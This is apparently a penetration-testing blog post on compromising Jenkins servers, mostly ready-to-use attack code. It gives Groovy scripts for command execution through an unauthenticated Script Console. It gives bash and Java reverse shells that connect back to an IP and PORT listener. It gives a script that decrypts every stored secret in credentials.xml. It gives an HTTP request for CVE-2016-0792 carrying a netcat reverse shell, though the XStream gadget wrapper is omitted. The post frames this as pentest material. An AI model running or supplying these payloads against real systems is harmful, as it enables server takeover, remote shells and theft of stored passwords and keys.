Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization

You will often come across a Jenkins Script Console (/script) that is reachable without any authentication, typically because security is switched off or the authorization strategy lets anyone do anything. Whatever you paste there runs as the Jenkins service account on the controller, and the same scripts can be POSTed as the script form parameter to /scriptText to get plain-text output without the HTML page.
Here you can find some code execution scripts which help you run commands and even get a reverse shell, depending on the operating system.

Jenkins Code Execution via Script Console

// Runs the command as the Jenkins service user on the controller.
// Note: a plain String.execute() splits on whitespace and knows no shell
// syntax, so pipes and redirects need ["/bin/sh", "-c", cmd].execute().
def command = "cat /etc/passwd"
def proc = command.execute()
proc.waitFor()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${proc.in.text}"
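A more robust version of the snippet above, as an added example (not code from the original post): it picks the right shell for the controller's OS, hands the whole command string to that shell so pipes and redirects work, drains stdout and stderr on background threads so a chatty command cannot deadlock on a full pipe buffer, and enforces a timeout. The sample command and the 30 second default are illustrative choices; the Groovy GDK methods it relies on (consumeProcessOutputStream, consumeProcessErrorStream, waitForOrKill) are real.

```groovy
// Added example, not from the original post. Run a shell command from the
// Jenkins Script Console and return exit code, stdout and stderr as a map.
def runCommand(String cmd, long timeoutMillis = 30000L) {
    boolean windows = System.getProperty("os.name").toLowerCase().contains("windows")
    // Hand the whole string to a real shell so pipes, redirects and quoting work.
    def argv = windows ? ["cmd.exe", "/c", cmd] : ["/bin/sh", "-c", cmd]
    Process proc = new ProcessBuilder(argv).start()

    def out = new StringBuffer()
    def err = new StringBuffer()
    // Drain both pipes on background threads. Reading proc.in.text only after
    // waitFor() hangs as soon as the child fills the OS pipe buffer.
    Thread tOut = proc.consumeProcessOutputStream(out)
    Thread tErr = proc.consumeProcessErrorStream(err)

    // Kill the child if it runs longer than the timeout, then collect output.
    proc.waitForOrKill(timeoutMillis)
    proc.waitFor()
    tOut.join()
    tErr.join()
    return [exit: proc.exitValue(), out: out.toString(), err: err.toString()]
}

// Where and as whom the script is executing (the controller, as the service user).
println "Host: ${InetAddress.localHost.hostName}, user: ${System.getProperty('user.name')}"

// Sample command (illustrative): works in both /bin/sh and cmd.exe.
def r = runCommand("whoami && echo done")
println "Exit: ${r.exit}"
println "Stdout:\n${r.out}"
println "Stderr:\n${r.err}"
```

Paste it into /script, or POST it as the script form parameter to /scriptText; when CSRF protection is enabled, fetch a crumb from /crumbIssuer/api/json first and send it as a header with the request.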

Getting Reverse Shell on Linux Machine

We can simply use the Java reverse shell from pentestmonkey's reverse shell cheat sheet. Replace IP and PORT with your listener; the shell is the Jenkins service user's.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Getting Reverse Shell on Windows Machine

// Replace host and port with your listener. cmd.exe is started with stderr
// merged into stdout and both directions are pumped over a TCP socket.
String host = "localhost";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Extracting passphrase from Jenkins’ credentials.xml

credentials.xml lives in the Jenkins home directory ($JENKINS_HOME, e.g. /var/lib/jenkins for the Linux packages) and stores passwords, passphrases and private keys encrypted with the instance's master key. Decrypting them may give us another password and perhaps root/administrative access on the server or on systems Jenkins deploys to. In order to check how to get the credentials, please see the post here.

Pass the encrypted value of a single field (the text of a <password>, <passphrase> or <privateKey> element, either the legacy base64 string or the newer {...} form) to hudson.util.Secret.decrypt, not the whole file. The Script Console can decrypt it because it runs with the instance's own key material:

println( hudson.util.Secret.decrypt("encrypted_value_from_credentials.xml").getPlainText() )
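To dump everything at once instead of decrypting fields one by one, here is an added example (not code from the original post): it reads credentials.xml from the running instance's home directory, walks every element and prints the ones that Secret.decrypt accepts, labelled with their element path. The Jenkins calls (Jenkins.instance.rootDir, hudson.util.Secret.decrypt, getPlainText) are real; the file name, the leaf-element heuristic and the output format are assumptions made for the example.

```groovy
import hudson.util.Secret
import jenkins.model.Jenkins

// Added example, not from the original post. Secret.decrypt() returns null for
// values that are not Jenkins-encrypted, so plain fields such as <id> and
// <username> are skipped and only password/passphrase/privateKey/secret print.
// Both the legacy base64 format and the newer "{...}" format are handled.
def credsFile = new File(Jenkins.instance.rootDir, "credentials.xml")  // assumed location
if (!credsFile.exists()) {
    println "No credentials.xml in ${Jenkins.instance.rootDir}"
    return
}

// Element path such as ".../UsernamePasswordCredentialsImpl/password"
def pathOf(Node n) {
    def parts = []
    for (def cur = n; cur != null; cur = cur.parent()) {
        parts.add(0, cur.name().toString())
    }
    return parts.join("/")
}

def root = new XmlParser().parse(credsFile)
int found = 0
root.depthFirst().each { Node n ->
    def kids = n.children()
    // Leaf element: exactly one child and that child is the text value.
    if (kids.size() != 1 || !(kids[0] instanceof String)) return
    String raw = ((String) kids[0]).trim()
    if (!raw) return
    Secret s = null
    try {
        s = Secret.decrypt(raw)
    } catch (Exception ignored) {
        // not an encrypted value, fall through with s == null
    }
    if (s == null) return
    found++
    println "${pathOf(n)} = ${s.plainText}"
}
println "Decrypted ${found} value(s)"
```

credentials.xml only holds system-scope credentials; folder-scoped ones are stored in the folder's config.xml and user-scoped ones under users/<name>/config.xml, and the same loop works on those files by changing credsFile. Decryption outside the console is also possible if you have copied secrets/master.key and secrets/hudson.util.Secret along with the XML.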

An additional resource can be found here: https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter—toying-with-powersploit/

Jenkins XStream Deserialization

Jenkins < 1.650 (and LTS < 1.642.2): CVE-2016-0792

The XML body of remote API calls such as createItem is deserialized with XStream, which gives unauthenticated remote code execution. A simple netcat reverse shell as the command can help us get a shell; replace IP and PORT with your listener.

POST /createItem?name=random HTTP/1.1
Host: 192.168.207.178:8081
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 759


<command>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&amp;1|nc IP PORT >/tmp/f</command>

The <command> element is only the inner part of the XML body; the XStream gadget markup around it that makes the deserialization execute the command is not reproduced in this post, and Content-Length has to match the full body you actually send. Because the body is XML, the & in 2>&1 must be written as &amp;.

If you only want to confirm the vulnerability during a pentest engagement without spawning a shell, replace the command with a ping to a host you control (ping -c 3 IP):

<command>ping -c 3 192.168.207.176</command>

Listen for the ICMP traffic with tcpdump; replace eth0 if you are listening on a different interface:

tcpdump -ni eth0 icmp

If all goes well, you will have the output as below:

# tcpdump -ni eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
09:55:33.571449 IP 192.168.207.178 > 192.168.207.176: ICMP echo request, id 18015, seq 1, length 64
09:55:33.571851 IP 192.168.207.176 > 192.168.207.178: ICMP echo reply, id 18015, seq 1, length 64
09:55:34.574175 IP 192.168.207.178 > 192.168.207.176: ICMP echo request, id 18015, seq 2, length 64
09:55:34.574231 IP 192.168.207.176 > 192.168.207.178: ICMP echo reply, id 18015, seq 2, length 64
09:55:35.577863 IP 192.168.207.178 > 192.168.207.176: ICMP echo request, id 18015, seq 3, length 64
09:55:35.577918 IP 192.168.207.176 > 192.168.207.178: ICMP echo reply, id 18015, seq 3, length 64
